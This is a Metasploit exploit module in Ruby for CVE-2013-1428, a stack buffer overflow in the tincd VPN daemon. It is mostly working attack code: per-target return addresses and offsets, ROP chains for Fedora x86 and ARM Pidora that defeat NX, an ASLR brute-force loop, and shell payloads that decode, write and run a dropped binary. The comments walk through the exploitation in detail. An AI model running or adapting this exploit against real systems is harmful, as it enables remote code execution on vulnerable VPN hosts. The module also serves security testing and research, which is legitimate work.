|
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'securerandom'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::TincdExploitClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Tinc's tincd
service. After authentication, a specially crafted tcp packet (default port 655)
leads to a buffer overflow and allows to execute arbitrary code. This module has
been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
(windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
for all versions <= 1.1pre6.
A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
it was recommended to the maintainer to start using DEP/ASLR and other protection
mechanisms.
},
'Author' =>
[
# PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch
# original finding, python PoC crash
'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342
],
'References' =>
[
['CVE', '2013-1428'],
['OSVDB', '92653'],
['BID', '59369'],
['URL', 'http://www.floyd.ch/?p=741'],
['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],
['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1675,
'DisableNops' => true
},
'Privileged' => true,
'Targets' =>
[
# full exploitation x86:
['Windows XP x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
['Windows 7 x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
],
['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
],
['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
# full exploitation ARM:
['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)', {
'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }
],
['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)', {
'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }
],
# crash only:
['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)', { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
],
'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
'DefaultTarget' => 0))
register_options(
[ # Only for shellcodes that write binary to disk
# Has to be short, usually either . or /tmp works
# /tmp could be mounted as noexec
# . is usually only working if tincd is running as root
OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
], self
)
end
def exploit
# #
# x86
# #
# WINDOWS XP and 7 full exploitation
# Simple, we only need some mona.py magic
# C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
# !mona config -set workingfolder c:\logs\%p
# !mona pc 1682
# --> C:\logs\tincd\pattern
# !mona findmsp
# Straight forward, when we overwrite EIP the second value
# on the stack is pointing to our payload.
# !mona findwild -o -type instr -s "pop r32# ret"
# FREEBSD full exploitation
# Same offset as windows, same exploitation method
# But we needed a new pop r32# ret for the freebsd version
# No mona.py help on bsd or linux so:
# - Dumped .text part of tincd binary in gdb
# - Search in hex editor for opcodes for "pop r32# ret":
# 58c3, 59c3, ..., 5fc3
# - Found a couple of 5dc3. ret = start of .text + offset in hex editor
# - 0x0804BABB works very well
# UBUNTU crash only
# Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
# the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
# at compile time. gcc is introducing a call to __memcpy_chk:
# http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
# memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
# *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
# from the repository. It might be exploitable for versions compiled with an older version of gcc.
# memcpy_chk seems to be in gcc since 2005:
# http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
# http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088
# OPENSUSE
# OpenSuse 11.2
# Installation as described on the tincd website. For 11.2 there are two versions.
# Decided for 1.0.16 as this is a vulnerable version
# wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
# rpm -i tinc-1.0.16-3.1.i586.rpm
# Again, strace shows us that the buffer overflow was detected (see Ubuntu)
# writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
# So a crash-only non-exploitable bof here. So let's go for manual install:
# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
# yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
# Exploitable. Let's see:
# tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
# the offset to pop ebp; ret is 0x0804b07f
# FEDORA
# Fedora 16
# yum has version 1.0.19
# yum install tinc
# Non-exploitable crash, see Ubuntu. Strace tells us:
# writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
# About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
# Manual compile went on with Fedora 19
# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
# yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
# Don't forget to stop firewalld for testing, as the port is still closed otherwise
# # hardening-check tincd
# tincd:
# Position Independent Executable: no, normal executable!
# Stack protected: no, not found!
# Fortify Source functions: no, only unprotected functions found!
# Read-only relocations: yes
# Immediate binding: no, not found!
# Running this module with target set to Windows:
# Program received signal SIGSEGV, Segmentation fault.
# 0x0041caa6 in ?? ()
# well and that's our windows offset...
# (gdb) info proc mappings
# 0x8048000 0x8068000 0x20000 0x0 /usr/local/sbin/tincd
# After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
# can try to execute the payload on the stack, but:
# (gdb) stepi
# Program received signal SIGSEGV, Segmentation fault.
# 0x08e8ee08 in ?? ()
# Digging deeper we find:
# dmesg | grep protection
# [ 0.000000] NX (Execute Disable) protection: active
# or:
# # objdump -x /usr/local/sbin/tincd
# [...] STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
# filesz 0x00000000 memsz 0x00000000 flags rw-
# or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
# Time for ROP
# To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
# as a pointer to instructions). Was lucky after some searching:
# (gdb) x/10i 0x4d10ee87
# 0x4d10ee87: pop %ebx
# 0x4d10ee88: mov ___FCKpd___0xf5d299dd,%eax
# 0x4d10ee8d: rcr %cl,%al
# 0x4d10ee8f: pop %esp
# 0x4d10ee90: ret
# ARCHLINUX
# archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
# pacman -S gcc zlib lzo openssl make && ./configure && make && make install
# Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
# -->Ret: 0x8065929
# No NX protection, it simply runs the shellcode :)
# #
# ARM
# #
# ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
# Although this is more for the interested reader, as Pidora development
# already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
# meaning it's an ARMv6 architecture
# yum has fixed version 1.0.21, so went for manual compile:
# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
# yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
# Is the binary protected?
# wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
# # ./checksec.sh --file /usr/local/sbin/tincd
# RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
# No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH /usr/local/sbin/tincd
# so again NX... but what about the system things?
# cat /proc/sys/kernel/randomize_va_space
# 2
# --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
# This is the default setting."
# Here some examples of the address of the system function:
# 0xb6c40848
# 0xb6cdd848
# 0xb6c7c848
# Looks like we would have to brute force one byte
# (gdb) info proc mappings
# 0x8000 0x23000 0x1b000 0 /usr/local/sbin/tincd
# 0x2b000 0x2c000 0x1000 0x1b000 /usr/local/sbin/tincd
# When we exploit we get the following:
# Program received signal SIGSEGV, Segmentation fault.
# 0x90909090 in ?? ()
# ok, finally a different offset to eip. Let's figure it out:
# $ tools/pattern_create.rb 1676
# Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
# (gdb) break *0x9000
# Breakpoint 1 at 0x9000
# See that our shellcode is *on* the stack:
# (gdb) x/10x $sp
# 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
# 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
# 0xbee14328: 0xe3a02006 0xe3a07001
# let's explore the code we can reuse:
# (gdb) info functions
# objdump -d /usr/local/sbin/tincd >assembly.txt
# while simply searching for the bx instruction we were not very lucky,
# but searching for some "pop pc" it's easy to find nice gadgets.
# we can write arguments to the .data section again:
# 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
# The problem is we can not reliably forecast the system function's address, but it's
# only one byte random, therefore we have to brute force it and/or find a memory leak.
# Let's assume it's a restarting daemon:
# create /etc/systemd/system/tincd.service and fill in Restart=restart-always
# ARM Debian Wheezy on qemu
# root@debian:~# apt-cache showpkg tinc
# Package: tinc
# Versions:
# 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
# nice, that's vulnerable
# apt-get install tinc
# apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
# wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
# # ./checksec.sh --file /usr/sbin/tincd
# RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
# Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/sbin/tincd
# Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here
packet_payload = payload.encoded
# Pidora and Fedora/ROP specific things
if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
rop_generator = nil
filename = rand_text_alpha(1)
cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'
if target.name =~ /Pidora 18/
print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
print_status('This requires a restarting tincd daemon!')
print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
rop_generator = method(:create_pidora_rop)
elsif target.name =~ /Fedora 19/
print_status('Using ROP to defeat NX on Fedora 19')
rop_generator = method(:create_fedora_rop)
end
if target.arch.include? ARCH_CMD
# The CMD payloads are a bit tricky on Fedora. As of december 2013
# some of the generic unix payloads (e.g. reverse shell with awk) don't work
# (even when executed directly in a terminal on Fedora)
# use generic/custom and specify PAYLOADSTR without single quotes
# it's usually sh -c *bla*
packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
else
# the binary drop payloads
packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
if packet_payload.length > target['offset']
print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
vprint_status("Achieved version with #{packet_payload.length} bytes")
end
end
end
if packet_payload.length > target['offset']
fail_with(Exploit::Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
end
injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')
vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")
if target.name =~ /Pidora 18/
# we have to brute force to defeat ASLR
datastore['BRUTEFORCE_TRIES'].times do
print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
setup_ciphers
print_status('Telling tinc exploit client to connect, handshake and send the payload')
begin
send_recv(injection)
rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
print_error(runtime_error.message)
print_error(runtime_error.backtrace.join("\n\t"))
rescue Rex::ConnectionRefused
print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
sleep(3)
next
end
secs = datastore['WAIT']
print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
sleep(secs)
end
print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
else
# Setup local ciphers
print_status('Initializing tinc exploit client (setting up ciphers)')
setup_ciphers
# The tincdExploitClient will do the crypto handshake with the server and
# send the injection (a packet), where the actual buffer overflow is triggered
print_status('Telling tinc exploit client to connect, handshake and send the payload')
send_recv(injection)
end
print_status('Exploit finished')
end
def get_cmd_binary_drop_payload(filename, cd, rop_generator)
elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
vprint_status("You will try to execute #{cmd.join(' ')}")
rop_generator.call(cmd)
end
def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
vprint_status("You will try to execute #{cmd.join(' ')}")
rop_generator.call(cmd)
end
def create_pidora_rop(sys_execv_args)
sys_execv_args = sys_execv_args.join(' ')
sys_execv_args += "\x00"
aslr_byte_guess = SecureRandom.random_bytes(1).ord
print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")
# Gadgets tincd
# c714: e1a00004 mov r0, r4
# c718: e8bd8010 pop {r4, pc}
mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
pop_r4_ret = [0x0000c718].pack('V')
# 1cef4: e580400c str r4, [r0, #12]
# 1cef8: e8bd8010 pop {r4, pc}
# mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')
# bba0: e5843000 str r3, [r4]
# bba4: e8bd8010 pop {r4, pc}
mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')
# 13ccc: e1a00003 mov r0, r3
# 13cd0: e8bd8008 pop {r3, pc}
pop_r3_ret = [0x00013cd0].pack('V')
# address to start rop (removing 6 addresses of garbage from stack)
# 15cb4: e8bd85f0 pop {r4, r5, r6, r7, r8, sl, pc}
# start_rop = [0x00015cb4].pack('V')
# see target Ret
# system function address base to brute force
# roughly 500 tests showed addresses between
# 0xb6c18848 and 0xb6d17848 (0xff distance)
system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')
# pointer into .data section
loc_dot_data = 0x0002b3f0 # a location inside .data
# Rop into system(), prepare address of payload in r0
rop = ''
# first, let's put the payload into the .data section
# Put the first location to write to in r4
rop += pop_r4_ret
sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
# Give location inside .data via stack
rop += [loc_dot_data + i * 4].pack('V')
# Pop 4 bytes of the command into r3
rop += pop_r3_ret
# Give 4 bytes of command on stack
if argument_part.length == 4
rop += argument_part
else
rop += argument_part + rand_text_alpha(4 - argument_part.length)
end
# Write the 4 bytes to the writable location
rop += mov_to_r4_addr_pop_r4_ret
end
# put the address of the payload into r4
rop += [loc_dot_data].pack('V')
# now move r4 to r0
rop += mov_r0_r4_pop_r4_ret
rop += rand_text_alpha(4)
# we don't care what ends up in r4 now
# call system
rop += system_addr
end
def create_fedora_rop(sys_execv_args)
# Gadgets tincd
loc_dot_data = 0x80692e0 # a location inside .data
pop_eax = [0x8065969].pack('V') # pop eax; ret
pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
pop_ecx = [0x804e113].pack('V') # pop ecx; ret
xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
# <ATTENTION> This one destroys ebx:
mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
# </ATTENTION>
# Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
# xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
# inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret
# Gadgets libc.so.6 libc-2.17.so
pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
int_80 = [0x4b6049c5].pack('V') # int 0x80
# Linux kernel system call 11: sys_execve
# ROP
rop = ''
index = 0
stored_argument_pointer_offsets = []
sys_execv_args.each_with_index do |argument, argument_no|
stored_argument_pointer_offsets << index
argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
# Put location to write to in eax
rop += pop_eax
# Give location inside .data via stack
rop += [loc_dot_data + index + i * 4].pack('V')
# Pop 4 bytes of the command into ecx
rop += pop_ecx
# Give 4 bytes of command on stack
if argument_part.length == 4
rop += argument_part
else
rop += argument_part + rand_text_alpha(4 - argument_part.length)
end
# Write the 4 bytes to the writable location
rop += mov_to_eax_addr
end
# We have to end the argument with a zero byte
index += argument.length
# We don't have "xor ecx, ecx", but we have it for eax...
rop += xor_eax_eax
rop += xchg_ecx_eax
# Put location to write to in eax
rop += pop_eax
# Give location inside .data via stack
rop += [loc_dot_data + index].pack('V')
# Write the zeros
rop += mov_to_eax_addr
index += 1 # where we can write the next argument
end
# Append address of the start of each argument
stored_argument_pointer_offsets.each do |offset|
rop += pop_eax
rop += [loc_dot_data + index].pack('V')
rop += pop_ecx
rop += [loc_dot_data + offset].pack('V')
rop += mov_to_eax_addr
index += 4
end
# end with zero
rop += xor_eax_eax
rop += xchg_ecx_eax
rop += pop_eax
rop += [loc_dot_data + index].pack('V')
rop += mov_to_eax_addr
rop += pop_ebx
rop += [loc_dot_data].pack('V')
rop += pop_ecx
rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')
rop += pop_edx
rop += [loc_dot_data + index].pack('V')
# sys call 11 = sys_execve
rop += pop_eax
rop += [0x0000000b].pack('V')
rop += int_80
end
end
|